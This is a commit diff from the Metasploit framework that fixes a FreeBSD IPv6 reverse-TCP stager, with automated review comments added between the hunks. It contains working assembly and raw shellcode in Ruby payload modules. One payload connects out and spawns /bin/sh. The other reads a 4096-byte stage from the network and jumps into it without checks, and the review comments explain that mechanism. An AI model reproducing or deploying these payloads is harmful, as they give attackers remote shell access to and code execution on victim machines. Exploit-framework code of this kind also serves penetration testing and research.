Fix up reverse_tcp ipv6 stager for freebsd

unstable
HD Moore 2012-02-01 01:41:24 -06:00
parent 29d8feaa24
commit 0c2a18d765
3 changed files with 38 additions and 20 deletions


@ -76,10 +76,10 @@ ipv6_address:
db 28 ; sa_family_t sin6_family; /* AF_INET6 */
dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */
dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */
dd 0x43424140 ; struct in6_addr sin6_addr; /* IP6 address */
dd 0x48474645
dd 0x4d4b4a49
dd 0x51504f4e
dd 0 ; struct in6_addr sin6_addr; /* IP6 address */
dd 0
dd 0
dd 0x01000000 ; default to ::1
dd 0 ; uint32_t sin6_scope_id; /* scope zone index */
skip_bounce:
@ -87,9 +87,26 @@ skip_bounce:
%ifndef USE_SINGLE_STAGE
read:
push byte 0x10
pop edx
shl edx, 8
sub esp, edx
mov ecx, esp ; Points to 4096 stack buffer
push edx ; Length
push ecx ; Buffer
%ifdef FD_REG_EBX
push ebx ; Socket
%else
push edi ; Socket
%endif
push ecx ; Buffer to Return
mov al, 0x3
mov byte [ecx - 0x3], 0x10
int 0x80
ret
int 0x80 ; read(socket, &buff, 4096)
ret ; Return
%endif
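Review bot: The comment on `push ecx ; Buffer to Return` undersells what that line does: on FreeBSD's i386 `int 0x80` convention the dword at the top of the stack is a return-address slot the kernel skips over, so this push both fills that slot and leaves the buffer address in place for the `ret` that follows the syscall, which pops it and transfers control into whatever `read()` wrote at `[ecx]`. Suggested comment: `push ecx ; dummy ret slot for int 0x80; popped by ret below to enter the received stage`. The `ret ; Return` comment should also state that eax/CF from the syscall are deliberately not inspected before the transfer, so a later reader does not assume a check exists elsewhere. The first hunk's `dd 0x01000000 ; default to ::1` is correct little-endian for the last in6_addr word, but its preceding `dd 0 ; struct in6_addr sin6_addr` comment could say "16 bytes, four dwords" so the four-line group reads as one field.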


@ -35,18 +35,17 @@ module Metasploit3
{
'Offsets' =>
{
'LHOST' => [ 43, 'ADDR6' ],
'LHOST' => [ 42, 'ADDR6' ],
'LPORT' => [ 36, 'n' ],
'SCOPEID' => [ 59, 'V' ]
'SCOPEID' => [ 58, 'V' ]
},
'Payload' =>
"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" +
"\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\x6a\x02" +
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x02" +
"\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" +
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"
}
))
register_options([
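Review bot: The `'Offsets'` table (`'LHOST' => [ 42, 'ADDR6' ]`, `'LPORT' => [ 36, 'n' ]`, `'SCOPEID' => [ 58, 'V' ]`) is hand-computed from the stager's assembly and the same three values are repeated verbatim in the second module's `'Offsets'` hash in the third file section; nothing in either file says where the numbers come from, which is how the 43-vs-42 drift this commit corrects crept in. Suggest a comment above `'Offsets' =>` in both modules, e.g. `# byte offsets into 'Payload': 36 = sin6_port, 42 = sin6_addr (16 bytes), 58 = sin6_scope_id; recompute from the ipv6 stager .asm whenever the payload bytes change`. The enclosing `module Metasploit3` definition and the hash it sits in begin before the hunk and continue after it.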


@ -45,16 +45,18 @@ module Metasploit3
{
'Offsets' =>
{
'LHOST' => [ 43, 'ADDR6' ],
'LHOST' => [ 42, 'ADDR6' ],
'LPORT' => [ 36, 'n' ],
'SCOPEID' => [ 59, 'V' ]
'SCOPEID' => [ 58, 'V' ]
},
'Payload' =>
"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" +
"\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\xb0\x03" +
"\xc6\x41\xfd\x10\xcd\x80\xc3"
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x10" +
"\x5a\xc1\xe2\x08\x29\xd4\x89\xe1\x52\x51\x57\x51\xb0\x03\xcd\x80" +
"\xc3"
}
))
register_options([
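Review bot: The new tail of `'Payload'` (`\x6a\x10\x5a\xc1\xe2\x08 ...`) fixes the stage read at 0x10 << 8 = 4096 bytes on the stack in a single `read(2)`, but the Ruby module gives no hint of that limit, so a reader of this file alone cannot tell how large a stage the stager accepts or that the byte string must be regenerated from the assembly rather than edited here. Suggest a comment next to `'Payload' =>`: `# generated from the ipv6 stager .asm; reads the stage into a 4096-byte stack buffer with one read(2)`. The enclosing module definition starts and ends outside the hunk.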